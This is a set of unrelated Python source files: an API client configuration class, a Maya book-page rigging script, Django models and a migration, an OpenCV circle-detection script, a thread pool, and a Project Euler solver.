'version': f'v{API_VERSION[0]}.{API_VERSION[1]}',
'hash_type': 'sha256',
'domain': 'default',
'group': 'default',
'storage_proxy_address_map': {},
'connection_timeout': '10.0',
'read_timeout': '0',
}
"""
The default values for config parameterse settable via environment variables
xcept the access and secret keys.
"""
_endpoints: List[URL]
_group: str
_hash_type: str
_skip_sslcert_validation: bool
def __init__(
self, *,
endpoint: Union[URL, str] = None,
endpoint_type: str = None,
domain: str = None,
group: str = None,
storage_proxy_address_map: Mapping[str, str] = None,
version: str = None,
user_agent: str = None,
access_key: str = None,
secret_key: str = None,
hash_type: str = None,
vfolder_mounts: Iterable[str] = None,
skip_sslcert_validation: bool = None,
connection_timeout: float = None,
read_timeout: float = None,
announcement_handler: Callable[[str], None] = None,
) -> None:
from . import get_user_agent
self._endpoints = (
_clean_urls(endpoint) if endpoint else
get_env('ENDPOINT', self.DEFAULTS['endpoint'], clean=_clean_urls)
)
random.shuffle(self._endpoints)
self._endpoint_type = endpoint_type if endpoint_type is not None else \
get_env('ENDPOINT_TYPE', self.DEFAULTS['endpoint_type'], clean=str)
self._domain = domain if domain is not None else \
get_env('DOMAIN', self.DEFAULTS['domain'], clean=str)
self._group = group if group is not None else \
get_env('GROUP', self.DEFAULTS['group'], clean=str)
self._storage_proxy_address_map = storage_proxy_address_map \
if storage_proxy_address_map is not None else \
get_env(
'OVERRIDE_STORAGE_PROXY',
self.DEFAULTS['storage_proxy_address_map'],
# The shape of this env var must be like "X1=Y1,X2=Y2"
clean=_clean_address_map,
)
self._version = version if version is not None else \
default_clean(self.DEFAULTS['version'])
self._user_agent = user_agent if user_agent is not None else get_user_agent()
if self._endpoint_type == 'api':
self._access_key = access_key if access_key is not None else \
get_env('ACCESS_KEY', '')
self._secret_key = secret_key if secret_key is not None else \
get_env('SECRET_KEY', '')
else:
self._access_key = 'dummy'
self._secret_key = 'dummy'
self._hash_type = hash_type.lower() if hash_type is not None else \
cast(str, self.DEFAULTS['hash_type'])
arg_vfolders = set(vfolder_mounts) if vfolder_mounts else set()
env_vfolders = set(get_env('VFOLDER_MOUNTS', '', clean=_clean_tokens))
self._vfolder_mounts = [*(arg_vfolders | env_vfolders)]
# prefer the argument flag and fallback to env if the flag is not set.
if skip_sslcert_validation:
self._skip_sslcert_validation = True
else:
self._skip_sslcert_validation = get_env(
'SKIP_SSLCERT_VALIDATION', 'no', clean=bool_env,
)
self._connection_timeout = connection_timeout if connection_timeout is not None else \
get_env('CONNECTION_TIMEOUT', self.DEFAULTS['connection_timeout'], clean=float)
self._read_timeout = read_timeout if read_timeout is not None else \
get_env('READ_TIMEOUT', self.DEFAULTS['read_timeout'], clean=float)
self._announcement_handler = announcement_handler
@property
def is_anonymous(self) -> bool:
return self._access_key == ''
@property
def endpoint(self) -> URL:
"""
The currently active endpoint URL.
This may change if there are multiple configured endpoints
and the current one is not accessible.
"""
return self._endpoints[0]
@property
def endpoints(self) -> Sequence[URL]:
"""All configured endpoint URLs."""
return self._endpoints
def rotate_endpoints(self):
if len(self._endpoints) > 1:
item = self._endpoints.pop(0)
self._endpoints.append(item)
def load_balance_endpoints(self):
pass
@property
def endpoint_type(self) -> str:
"""
The configured endpoint type.
"""
return self._endpoint_type
@property
def domain(self) -> str:
"""The configured domain."""
return self._domain
@property
def group(self) -> str:
"""The configured group."""
return self._group
@property
def storage_proxy_address_map(self) -> Mapping[str, str]:
"""The storage proxy address map for overriding."""
return self.storage_proxy_address_map
@property
def user_agent(self) -> str:
"""The configured user agent string."""
return self._user_agent
@property
def access_key(self) -> str:
"""The configured API access key."""
return self._access_key
@property
def secret_key(self) -> str:
"""The configured API secret key."""
return self._secret_key
@property
def version(self) -> str:
"""The configured API protocol version."""
return self._version
@property
def hash_type(self) -> str:
"""The configured hash algorithm for API authentication signatures."""
return self._hash_type
@property
def vfolder_mounts(self) -> Sequence[str]:
"""The configured auto-mounted vfolder list."""
return self._vfolder_mounts
@property
def skip_sslcert_validation(self) -> bool:
"""Whether to skip SSL certificate validation for the API gateway."""
return self._skip_sslcert_validation
@property
def connection_timeout(self) -> float:
"""The maximum allowed duration for making TCP connections to the server."""
return self._connection_timeout
@property
def read_timeout(self) -> float:
"""The maximum allowed waiting time for the first byte of the response from the server."""
return self._read_timeout
@property
def announcement_handler(self) -> Optional[Callable[[str], None]]:
'''The announcement handler to display server-set announcements.'''
return self._announcement_handler
def get_config():
"""
Returns the configuration for the current process.
If there is no explicitly set :class:`APIConfig` instance,
it will generate a new one from the current environment variables
and defaults.
"""
global _config
if _config is None:
_config = APIConfig()
return _config
def set_config(conf: APIConfig):
"""
Sets the configuration used throughout the current process.
"""
global _config
_config = conf
|
#!/usr/bin/env python
# encoding: utf-8
#LTB:import tim_pageSetup;reload(tim_pageSetup);tim_pageSetup.main()
"""
tim_pageSetup.py
Created by Tim Reischmann on 2011-10-26.
Copyright (c) 2011 Tim Reischmann. All rights reserved.
usage:
import tim_pageSetup;reload(tim_pageSetup);tim_pageSetup.main()
set:
jointLength = 12
jointNumber = 8
pages = 5
in main()
"""
import pymel.core as pm
from datetime import datetime
#Global Var definitions
proc_name = "## pageSetup: "
jointLength = 12.0
jointNumber = 12
paperWidth = 12.0
paperLength = jointLength
pages = 34
#pages = 4
degree = 90
UVnormalized = 1
paperSubdivisionsX = 2
paperSubdivisionsY = jointNumber
ctrlRadius = 7.0
jacketBack = 2.3
jacketWidth = 12.8
bookmodel = "X:/Projects/GREY11_ANM71_Rewe_Starzone/GR11A71_Shots/GR11A71_Animatic/Animatic_Maya/Scenes/album_v002.ma"
jacketAttr = ['openL', 'openR', 'bendL', 'bendR', 'twistL', 'twistR']
def main():
prefRun()
#pm.importFile(bookmodel)
containers = createContainers("book")
rigBook(containers)
rigJacket(containers)
organizeContainers(containers)
#moveEnds()
#movePages()
pm.select('world_ctrl', r=1)
def buildJacket():
planeBack = pm.polyPlane(
width=jacketBack,
height=paperLength,
subdivisionsX=paperSubdivisionsX,
subdivisionsY=paperSubdivisionsY,
axis=(0, 1, 0),
createUVs=UVnormalized,
ch=1,
name="planeBack"
)
planeLeft = pm.polyPlane(
width=paperWidth,
height=paperLength,
subdivisionsX=jointNumber,
subdivisionsY=paperSubdivisionsY,
axis=(1, 0, 0),
createUVs=UVnormalized,
ch=1,
name="planeLeft"
)
pm.move(planeLeft, (((jacketBack/2)*-1),paperLength/2,0))
planeRight = pm.polyPlane(
width=paperWidth,
height=paperLength,
subdivisionsX=jointNumber,
subdivisionsY=paperSubdivisionsY,
axis=(1, 0, 0),
createUVs=UVnormalized,
ch=1,
name="planeRight"
)
pm.move(planeRight, (((jacketBack/2)),paperLength/2,0))
jacket = pm.polyUnite(planeBack, planeRight, planeLeft,
ch=0, name="jacket_geo")
pm.select(cl=1)
return jacket
def createContainers(rigName):
#create containers for the geo and rig
baseGroup = pm.group(empty=1, name=rigName)
rig = pm.group(empty=1, name='rig')
geo = pm.group(empty=1, name='geo')
paper_grp = pm.group(empty=1, name='paper_grp')
pages_grp = pm.group(empty=1, name='pages_grp')
jacket_grp = pm.group(empty=1, name='jacket_grp')
pageTargets_grp = pm.group(empty=1, name='pageTargets_grp')
ctrl = createPageCtrl(name='world_ctrl')
jacket_geo = buildJacket()
geo.inheritsTransform.set(0)
pm.select(cl=1)
return {
"pageTargets_grp":pageTargets_grp,
"jacket_geo":jacket_geo,
'pages_grp':pages_grp,
'jacket_grp':jacket_grp,
"ctrl":ctrl,
"baseGroup":baseGroup,
"rig":rig,
"geo":geo,
"paper_grp":paper_grp,
}
def rigJacket(containers):
pm.select(cl=1)
baseJoint = pm.joint(p=(0,0,0), name="jacketBase")
jacketRight = createJointChain(name='jacketRight')
pm.select(jacketRight[0], r=1)
pm.move(0, jacketBack/2, 0)
pm.select(cl=1)
pm.select(baseJoint, r=1)
jacketLeft = createJointChain(name='jacketLeft')
pm.select(jacketLeft[0], r=1)
pm.move(0, ((jacketBack/2)*-1), 0)
pm.select(cl=1)
#create more attrs
pm.addAttr(containers["ctrl"],
ln="__",
at="enum",
en="______"
)
pm.setAttr(containers["ctrl"]+".__", e=1, keyable=1)
jacketAttrNames = []
#create new attr
for attr in jacketAttr:
attrName = containers["ctrl"]+"."+attr
jacketAttrNames.append(attrName)
pm.addAttr(containers["ctrl"],
ln=attr,
at="double",
dv=0)
pm.setAttr(attrName, e=1, keyable=1)
pm.connectAttr( jacketAttrNames[0], jacketLeft[0].rz )
reverseConnectAttr( jacketAttrNames[1], jacketRight[0].rz )
#connect left jacket bend
for joint in jacketLeft:
firstJoint = jacketLeft[0]
lastJoint = jacketLeft[-1]
if joint == firstJoint or joint == lastJoint:
continue
pm.connectAttr( jacketAttrNames[2], joint.rz )
#connect right jacket bend
for joint in jacketRight:
firstJoint = jacketRight[0]
lastJoint = jacketRight[-1]
if joint == firstJoint or joint == lastJoint:
continue
reverseConnectAttr( jacketAttrNames[3], joint.rz )
#connect left jacket twist
for joint in jacketLeft:
firstJoint = jacketLeft[0]
lastJoint = jacketLeft[-1]
if joint == lastJoint:
continue
pm.connectAttr( jacketAttrNames[4], joint.ry )
#connect right jacket twist
for joint in jacketRight:
firstJoint = jacketRight[0]
lastJoint = jacketRight[-1]
if joint == lastJoint:
continue
reverseConnectAttr( jacketAttrNames[5], joint.ry )
pm.select(baseJoint, r=1, hi=1)
pm.select(containers["jacket_geo"], add=1, )
pm.bindSkin(toAll = 1, colorJoints = 1)
pm.select(cl=1)
pm.parent(baseJoint, containers["jacket_grp"])
pm.select(cl=1)
def organizeContainers(containers):
pm.parent(containers["rig"], containers["baseGroup"])
pm.parent(containers["geo"], containers["baseGroup"])
pm.parent(containers["paper_grp"], containers["geo"])
pm.parent(containers["pageTargets_grp"], containers["ctrl"])
pm.parent(containers["pages_grp"], containers["ctrl"])
pm.parent(containers["ctrl"], containers["rig"])
pm.parent(containers["jacket_geo"], containers["geo"])
pm.parent(containers["jacket_grp"], containers["ctrl"])
def rigBook(containers):
center = createJointChain(name='center')
left = createJointChain(name='left')
right = createJointChain(name='right')
ctrl = containers["ctrl"]
pm.addAttr(containers["ctrl"],
ln="_",
at="enum",
en="______"
)
pm.setAttr(containers["ctrl"]+"._", e=1, keyable=1)
for page in range(pages):
pageName = 'page'+str(page)
skin = createJointChain(pageName+"_")
rigPage(skin, center, left, right, ctrl, pageName)
paper = createPaper(pageName)
pm.select(skin, r=1, hi=1)
pm.select(paper, add=1, )
pm.bindSkin(toAll = 1, colorJoints = 1)
pm.select(cl=1)
pm.parent(paper, containers["paper_grp"])
pm.parent(skin[0], containers["pages_grp"])
pm.select(cl=1)
print "rigged: %s" % pageName
pm.parent(center[0], containers["pageTargets_grp"])
pm.parent(left[0], containers["pageTargets_grp"])
pm.parent(right[0], containers["pageTargets_grp"])
def createPaper(pageName):
paper = pm.polyPlane(
width=paperWidth,
height=paperLength,
subdivisionsX=paperSubdivisionsX,
subdivisionsY=paperSubdivisionsY,
axis=(1, 0, 0),
createUVs=UVnormalized,
ch=1,
name=pageName+"_paper_geo"
)
pm.move(paper, 0, paperLength/2, 0)
pm.select(cl=1)
return paper
def createJointChain(name='joint'):
number = jointNumber+1
newChain = []
for i in range(number):
jointName = name+str(i+1)
length = (jointLength/(number-1))*i
newJoint = pm.joint(p=(0,length,0), name=jointName)
newChain.append(newJoint)
pm.select(cl=1)
return newChain
def pl(items):
'''print a list in a nicer format for debugging
'''
for i in items:
print i
def pd(items):
'''print a dict in a nicer format for debugging
'''
for i in items.keys():
print i,"|", items[i]
def colorCtrl(containers):
'''colors the control yellow. Ugly! rewrite!
'''
pm.select(containers["ctrl"], r=1)
shape = pm.listRelatives(s)
pm.setAttr((shape[0]+".overrideEnabled"),1)
pm.setAttr((shape[0]+".overrideColor"),17)
def prefRun():
'''prefix script run with script name und datetime
'''
print '\n\n\n',proc_name,
print datetime.now(),'##'
def createPageCtrl(name):
control = pm.circle(
c=(0, 0, 0),
nr=(0, 1, 0),
sw=360,
r=ctrlRadius,
d=3, ut=0, tol=0.01, s=8, ch=1,
n=name)
pm.move(control, 0, paperLength/2, 0)
pm.makeIdentity( control, apply=True, translate=True, scale=True, rotate=True)
shape = pm.listRelatives(control)
shape[0].overrideEnabled.set(1)
shape[0].overrideColor.set(17)
pm.select(cl=1)
return name
def reverseConnectAttr(leftAttr, rightAttr):
connector = pm.createNode("multiplyDivide",
name="connect_"+leftAttr.replace('.','_')+"_"+rightAttr.replace('.','_'))
pm.setAttr(connector.operation, 1)
pm.connectAttr(leftAttr, connector.input1X)
pm.setAttr(connector.input2X,-1)
pm.connectAttr( connector.outputX, rightAttr)
def rigPage(skin, center, left, right, ctrl, pageName):
'''This will do the actual page setup.
takes lists of joints: skin, center, left, right
the name of the ctrl
and the desired attr name to add to the ctrl
'''
#Variable Definitions
driveName = ctrl+"."+pageName
#Driven key tangent type
inTangentType = 'linear'
outTangentType = 'linear'
#create new attr
pm.addAttr(ctrl, ln=pageName, at="double", min=-10, max=10, dv=0)
pm.setAttr(driveName, e=1, keyable=1)
for j in range(len(skin)):
#create a blend weighted node for translate x, y, z and rotate x, y, z
rx = pm.createNode("blendWeighted", n=(skin[j]+"rx").replace("|", "_"))
ry = pm.createNode("blendWeighted", n=(skin[j]+"ry").replace("|", "_"))
rz = pm.createNode("blendWeighted", n=(skin[j]+"rz").replace("|", "_"))
tx = pm.createNode("blendWeighted", n=(skin[j]+"tx").replace("|", "_"))
ty = pm.createNode("blendWeighted", n=(skin[j]+"ty").replace("|", "_"))
tz = pm.createNode("blendWeighted", n=(skin[j]+"tz").replace("|", "_"))
'''blendWeighted
is one of those nodes that don't work just yet. You need to assign a value
to a certain attribute in order for the node to create it. The next section
will create inputs and weights for translate x, y, z and rotate x, y, z
'''
#create w[0] weight attributes
rx.w[0].set(0)
ry.w[0].set(0)
rz.w[0].set(0)
tx.w[0].set(0)
ty.w[0].set(0)
tz.w[0].set(0)
#create w[1] weight attributes
rx.w[1].set(0)
ry.w[1].set(0)
rz.w[1].set(0)
tx.w[1].set(0)
ty.w[1].set(0)
tz.w[1].set(0)
#create w[2] weight attributes
rx.w[2].set(0)
ry.w[2].set(0)
rz.w[2].set(0)
tx.w[2].set(0)
ty.w[2].set(0)
tz.w[2].set(0)
#create i[0] input attributes
rx.i[0].set(0)
ry.i[0].set(0)
rz.i[0].set(0)
tx.i[0].set(0)
ty.i[0].set(0)
tz.i[0].set(0)
#create i[1] input attributes
rx.i[1].set(0)
ry.i[1].set(0)
rz.i[1].set(0)
tx.i[1].set(0)
ty.i[1].set(0)
tz.i[1].set(0)
#create i[2] input attributes
rx.i[2].set(0)
ry.i[2].set(0)
rz.i[2].set(0)
tx.i[2].set(0)
ty.i[2].set(0)
tz.i[2].set(0)
#connect target joints to blendweights
left[j].rx.connect(rx.i[0])
left[j].ry.connect(ry.i[0])
left[j].rz.connect(rz.i[0])
center[j].rx.connect(rx.i[1])
center[j].ry.connect(ry.i[1])
center[j].rz.connect(rz.i[1])
right[j].rx.connect(rx.i[2])
right[j].ry.connect(ry.i[2])
right[j].rz.connect(rz.i[2])
left[j].tx.connect(tx.i[0])
left[j].ty.connect(ty.i[0])
left[j].tz.connect(tz.i[0])
center[j].tx.connect(tx.i[1])
center[j].ty.connect(ty.i[1])
center[j].tz.connect(tz.i[1])
right[j].tx.connect(tx.i[2])
right[j].ty.connect(ty.i[2])
right[j].tz.connect(tz.i[2])
#connect blendweights to their respective connections
rx.o.connect(skin[j].rx)
ry.o.connect(skin[j].ry)
rz.o.connect(skin[j].rz)
tx.o.connect(skin[j].tx)
ty.o.connect(skin[j].ty)
tz.o.connect(skin[j].tz)
#set driven keys on blendweights
pm.setDrivenKeyframe(rx.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=1)
pm.setDrivenKeyframe(ry.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=1)
pm.setDrivenKeyframe(rz.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=1)
pm.setDrivenKeyframe(rx.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=0)
pm.setDrivenKeyframe(ry.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=0)
pm.setDrivenKeyframe(rz.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=0)
pm.setDrivenKeyframe(rx.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=0)
pm.setDrivenKeyframe(ry.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=0)
pm.setDrivenKeyframe(rz.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=0)
pm.setDrivenKeyframe(rx.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=0)
pm.setDrivenKeyframe(ry.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=0)
pm.setDrivenKeyframe(rz.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=0)
pm.setDrivenKeyframe(rx.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=1)
pm.setDrivenKeyframe(ry.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=1)
pm.setDrivenKeyframe(rz.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=1)
pm.setDrivenKeyframe(rx.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=0)
pm.setDrivenKeyframe(ry.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=0)
pm.setDrivenKeyframe(rz.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=0)
pm.setDrivenKeyframe(rx.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=0)
pm.setDrivenKeyframe(ry.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=0)
pm.setDrivenKeyframe(rz.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=0)
pm.setDrivenKeyframe(rx.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=0)
pm.setDrivenKeyframe(ry.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=0)
pm.setDrivenKeyframe(rz.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=0)
pm.setDrivenKeyframe(rx.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=1)
pm.setDrivenKeyframe(ry.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=1)
pm.setDrivenKeyframe(rz.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=1)
pm.setDrivenKeyframe(tx.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=1)
pm.setDrivenKeyframe(ty.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=1)
pm.setDrivenKeyframe(tz.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=1)
pm.setDrivenKeyframe(tx.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=0)
pm.setDrivenKeyframe(ty.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=0)
pm.setDrivenKeyframe(tz.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=0)
pm.setDrivenKeyframe(tx.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=0)
pm.setDrivenKeyframe(ty.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=0)
pm.setDrivenKeyframe(tz.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=-10, v=0)
pm.setDrivenKeyframe(tx.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=0)
pm.setDrivenKeyframe(ty.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=0)
pm.setDrivenKeyframe(tz.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=0)
pm.setDrivenKeyframe(tx.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=1)
pm.setDrivenKeyframe(ty.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=1)
pm.setDrivenKeyframe(tz.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=1)
pm.setDrivenKeyframe(tx.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=0)
pm.setDrivenKeyframe(ty.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=0)
pm.setDrivenKeyframe(tz.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=0, v=0)
pm.setDrivenKeyframe(tx.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=0)
pm.setDrivenKeyframe(ty.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=0)
pm.setDrivenKeyframe(tz.w[0], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=0)
pm.setDrivenKeyframe(tx.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=0)
pm.setDrivenKeyframe(ty.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=0)
pm.setDrivenKeyframe(tz.w[1], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=0)
pm.setDrivenKeyframe(tx.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=1)
pm.setDrivenKeyframe(ty.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=1)
pm.setDrivenKeyframe(tz.w[2], itt=inTangentType, ott=outTangentType, cd=driveName, dv=10, v=1)
def moveEnds():
pm.select('left2', r=1, hi=1)
joints = pm.ls(sl=1)
for joint in joints:
joint.rz.set(degree)
pm.select('right2', r=1, hi=1)
joints = pm.ls(sl=1)
for joint in joints:
joint.rz.set(degree*-1)
def moveEnds2():
try:
pm.select('left1', r=1)
joints = pm.ls(sl=1)
for joint in joints:
joint.rz.set(degree-10)
except:
pass
try:
pm.select('right1', r=1)
joints = pm.ls(sl=1)
for joint in joints:
joint.rz.set((degree-10)*-1)
except:
pass
try:
pm.select('left2', r=1)
joints = pm.ls(sl=1)
for joint in joints:
joint.rz.set(degree-70)
except:
pass
try:
pm.select('right2', r=1)
joints = pm.ls(sl=1)
for joint in joints:
joint.rz.set((degree-70)*-1)
except:
pass
try:
pm.select('left3', r=1)
joints = pm.ls(sl=1)
for joint in joints:
joint.rz.set(degree-100)
except:
pass
try:
pm.select('right3', r=1)
joints = pm.ls(sl=1)
for joint in joints:
joint.rz.set((degree-100)*-1)
except:
pass
def movePages():
book = pm.ls('world_ctrl')[0]
for page in range(pages):
print page, "|", (book+"."+('page'+str(page)))
#pm.setAttr(book+"."+('page'+str(page)),-10)
pm.setAttr(book+"."+('page'+str(page)), pm.getAttr(book+"."+('page'+str(page)))+((20/pages)*page) )
|
# Generated by Django 3.0.4 on 2020-04-04 22:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('boards', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='content',
field=models.TextField(default='', max_length=2400),
),
migrations.AlterField(
model_name='comment',
name='published_on_date',
field=models.DateTimeField(auto_now_add=True),
),
]
|
import cv2
import numpy as np
from math import pi
img = cv2.imread('test.jpeg', 0)
img = cv2.medianBlur(img, 5)
# hough --> only in grayscale
gray_img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
circles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, 1, 100, param1=100, param2=30, minRadius=0, maxRadius=0)
#If the circles returns nothing(which is the case where it can't find a circle), print msg
if not(isinstance(circles, type(None))):
circles = np.uint16(np.around(circles))
#print(len(circles[0])/3)
print(circles)
for i in circles[0, :]:
#i[0] row and i[1] column (center) + i[2] radius
print(pi * i[2])
# draw the outer circle
cv2.circle(gray_img, (i[0], i[1]), i[2], (0, 255, 0), 2)
# draw the center of the circle
cv2.circle(gray_img, (i[0], i[1]), 2, (0, 0, 255), 3)
else:
print("Nothing found.")
#scale
resized_img = cv2.resize(gray_img, (500, 500))
cv2.imshow('detected circles', resized_img)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
"""
Esta clase contiene una coleccion de threads los cuales se van a dedicar a cumplir
tasks conforme se estas sean agregadas al task(Queue). Gracias a esta implementacion
el servidor va a poder servir varias conexiones al mismo tiempo.
"""
from Queue import Queue
from trabajador import Trabajador
class ThreadPool:
def __init__(self, num_hilos):
#los tasks a realizar son representados por un Queue. En este caso estamos
#inicializando un FIFO Queue. El parametro que recibe es el maximo de elementos
#que pueden estar en este Queue.
self.tasks = Queue(num_hilos)
#Inicializamos un Trabajador por cada uno de los num_hilos especificados.
#(un worker por hilo). Y los ponemos a trabajar en los tasks que se encuentran
#en el queue. Como Queue es un objeto entonces todos los workers van a referenciar
#a la misma instancia de Queue, osea que todos pueden ver cuando un nuevo task se
#agrega, pero solo uno puede trabajar en el nuevo task (aqui es donde el objeto Queue
#implementa el control de acceso por nosotros)
for i in range(num_hilos):
Trabajador(self.tasks)
#este metodo permite agregar un task al queue. Los tasks vienen representados por una funcion
#(metodo) y sus argumentos ('*args' y '**kwargs') asi los workers lo unico que tienen que hacer
#es ejecutar la funcion y pasarle los metodos.
def add_task(self, function, *args, **kwargs):
self.tasks.put((function, args, kwargs)) #agregamos el task al queue
def __str__(self):
return 'Tasks del Thread Pool: %s' % self.tasks
|
from django.db import models
from django.contrib.auth.models import User
import datetime
from django.utils import timezone
# Create your models here.
class class1(models.Model):
name = models.CharField(max_length=30, blank=True)
class Meta:
db_table = '_App1_class1'
class class2(models.Model):
name = models.CharField(max_length=30, blank=True)
class1s = models.ManyToManyField(class1,)
class Meta:
db_table = '_App1_class2'
class BaseModel(models.Model):
active = models.BooleanField(default=1)
created_by = models.ForeignKey(User, on_delete=models.PROTECT, default='0', related_name='%(class)s_Creator')
created = models.DateTimeField(auto_now_add=True, blank=False)
modified_by = models.ForeignKey(User, on_delete=models.PROTECT, default='0', related_name='%(class)s_modified_by')
modified = models.DateTimeField(auto_now=True, blank=False)
class Meta:
abstract = True
class Address(BaseModel):
Home = 1
Work = 2
Other = 0
TYPES_CHOICES = (
(Home, 'HOME'),
(Work, 'Work'),
(Other, 'Other')
)
type = models.CharField(max_length=20, choices = TYPES_CHOICES)
street_line1 = models.CharField(max_length = 100, blank = True)
street_line2 = models.CharField(max_length = 100, blank = True)
city = models.CharField(max_length = 100, blank = True)
state = models.CharField(max_length = 100, blank = True)
zipcode = models.CharField(max_length = 5, blank = True)
country = models.CharField(max_length = 100, blank = True)
class Person(BaseModel):
name = models.CharField(max_length=30, blank=True)
userId = models.ForeignKey(User, on_delete=models.CASCADE, blank=True)
def __str__(self):
return self.name
|
#!/usr/bin/python
arr = [line.rstrip('\n') for line in open('problem_67.in')]
for i in range(0, len(arr)):
arr[i] = list(arr[i].split(" "))
for j in range(0, len(arr[i])):
arr[i][j] = int(arr[i][j])
holdSums = arr[len(arr) - 1]
for i in range(len(arr) - 2, -1, -1):
sums = arr[i]
for j in range(0, len(sums)):
if holdSums[j] > holdSums[j + 1]:
sums[j] += holdSums[j]
else:
sums[j] += holdSums[j + 1]
holdSums = sums
print(holdSums[0])
|
import uuid
import enum
from django.db import models
from django.utils import timezone, translation
from django.conf import settings
from django.core.validators import MinValueValidator, MaxValueValidator
from django.contrib.auth import get_user_model
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation
from django_numerators.models import NumeratorMixin
from mptt.models import MPTTModel, TreeForeignKey, TreeManager
_ = translation.ugettext_lazy
class GradeClass(enum.Enum):
CLASS_A = 'A'
CLASS_B = 'B'
CLASS_C = 'C'
CLASS_D = 'D'
CLASS_E = 'E'
class RuleClass(enum.Enum):
RULE_A = 'A'
RULE_B = 'B'
RULE_C = 'C'
RULE_D = 'D'
RULE_E = 'E'
class Grade(models.Model):
class Meta:
ordering = ['slug']
verbose_name = _('Grade')
verbose_name_plural = _('Grade')
id = models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
verbose_name='uuid')
slug = models.SlugField(
unique=True,
max_length=80,
choices=[(str(x.value), str(x.name.replace('_', ' '))) for x in GradeClass],
default=GradeClass.CLASS_A.value,
verbose_name=_("Slug"))
name = models.CharField(
max_length=80, unique=True,
verbose_name=_('Name'))
description = models.CharField(
max_length=500, blank=True)
def __str__(self):
return self.name
class Rate(models.Model):
class Meta:
verbose_name = _('Rate')
verbose_name_plural = _('Rate')
ordering = ['slug']
id = models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
verbose_name='uuid')
slug = models.SlugField(
unique=True,
max_length=80,
choices=[(str(x.value), str(x.name.replace('_', ' '))) for x in GradeClass],
default=GradeClass.CLASS_A.value,
verbose_name=_("Slug"))
name = models.CharField(
max_length=80, unique=True,
verbose_name=_('Name'))
description = models.CharField(
max_length=500, blank=True)
def __str__(self):
return self.name
class Rule(models.Model):
class Meta:
verbose_name = _('Rule')
verbose_name_plural = _('Rule')
ordering = ['slug']
id = models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
verbose_name='uuid')
slug = models.SlugField(
unique=True,
max_length=80,
choices=[(str(x.value), str(x.name.replace('_', ' '))) for x in RuleClass],
default=RuleClass.RULE_A.value,
verbose_name=_("Slug"))
name = models.CharField(
max_length=80, unique=True,
verbose_name=_('Name'))
description = models.CharField(
max_length=500, blank=True)
weighting = models.DecimalField(
max_digits=4,
decimal_places=2,
validators=[
MinValueValidator(0),
MaxValueValidator(100)
]
)
def __str__(self):
return self.name
class GradeRate(models.Model):
class Meta:
verbose_name = _('Grade Rate')
verbose_name_plural = _('Grade Rates')
